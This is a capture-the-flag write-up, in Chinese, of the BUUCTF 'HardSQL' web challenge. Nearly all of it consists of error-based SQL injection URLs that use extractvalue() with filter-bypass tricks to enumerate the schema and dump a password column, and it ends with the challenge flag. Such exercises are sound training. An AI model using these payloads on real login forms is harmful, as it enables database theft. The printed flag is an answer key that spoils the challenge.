BUUCTF---web---[极客大挑战 2019]HardSQL

简介: BUUCTF---web---[极客大挑战 2019]HardSQL

1、题目描述

2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试

3、使用extractvalue()函数构造下面方法,发现不可以,可能是有些字符被过滤了。这里将


/check.php?username=admin&password=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)))#


查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select(database()))))%23

使用上面语句可以查出数据库名

4、用类似的方法查表名:这里注意=用like替换


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='geek')%23


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

5、查表中字段名:


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select group_concat(table_column) from information_schema.columns where table_name='H4rDsq1')%23


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_column))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

6、查出对应库对应表对应字段password中的值


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select password from geek.H4rDsq1))%23


/check.php?username=admin&password=1%27^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

7、  太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点


/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,15))from(geek.H4rDsq1))))%23  

8、

flag{b0583d02-20d4-4e6d-8e4c-55937ed420d8}

相关文章
|
安全 网络安全 PHP
BUUCTF Web [极客大挑战 2019]Knife
BUUCTF Web [极客大挑战 2019]Knife [极客大挑战 2019]Knife 一、题目简介 二、思路分析
472 0
BUUCTF Web [极客大挑战 2019]Knife
|
安全 网络安全 PHP
BUUCTF Web [极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File 一、题目简介 二、思路分析 1)信息泄露
807 0
BUUCTF Web [极客大挑战 2019]Secret File
|
SQL 安全 网络安全
BUUCTF Web [极客大挑战 2019]LoveSQL
一、题目简介 进入题目连接是一个「登录」界面
360 0
BUUCTF Web [极客大挑战 2019]LoveSQL
|
安全 网络安全
BUUCTF Web [极客大挑战 2019]Havefun
大挑战 2019]Havefun 一、题目简介
393 0
BUUCTF Web [极客大挑战 2019]Havefun
|
SQL 安全 网络安全
BUUCTF Web [极客大挑战 2019]EasySQL
[HCTF 2018]WarmUp 一、题目简介
214 0
|
1月前
|
XML JSON API
ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
100 3
|
15天前
|
设计模式 前端开发 数据库
Python Web开发:Django框架下的全栈开发实战
【10月更文挑战第27天】本文介绍了Django框架在Python Web开发中的应用,涵盖了Django与Flask等框架的比较、项目结构、模型、视图、模板和URL配置等内容,并展示了实际代码示例,帮助读者快速掌握Django全栈开发的核心技术。
101 44
|
11天前
|
前端开发 API 开发者
Python Web开发者必看!AJAX、Fetch API实战技巧,让前后端交互如丝般顺滑!
在Web开发中,前后端的高效交互是提升用户体验的关键。本文通过一个基于Flask框架的博客系统实战案例,详细介绍了如何使用AJAX和Fetch API实现不刷新页面查看评论的功能。从后端路由设置到前端请求处理,全面展示了这两种技术的应用技巧,帮助Python Web开发者提升项目质量和开发效率。
26 1
|
13天前
|
XML 安全 PHP
PHP与SOAP Web服务开发:基础与进阶教程
本文介绍了PHP与SOAP Web服务的基础和进阶知识,涵盖SOAP的基本概念、PHP中的SoapServer和SoapClient类的使用方法,以及服务端和客户端的开发示例。此外,还探讨了安全性、性能优化等高级主题,帮助开发者掌握更高效的Web服务开发技巧。
|
16天前
|
安全 数据库 开发者
Python Web开发:Django框架下的全栈开发实战
【10月更文挑战第26天】本文详细介绍了如何在Django框架下进行全栈开发,包括环境安装与配置、创建项目和应用、定义模型类、运行数据库迁移、创建视图和URL映射、编写模板以及启动开发服务器等步骤,并通过示例代码展示了具体实现过程。
29 2

热门文章

最新文章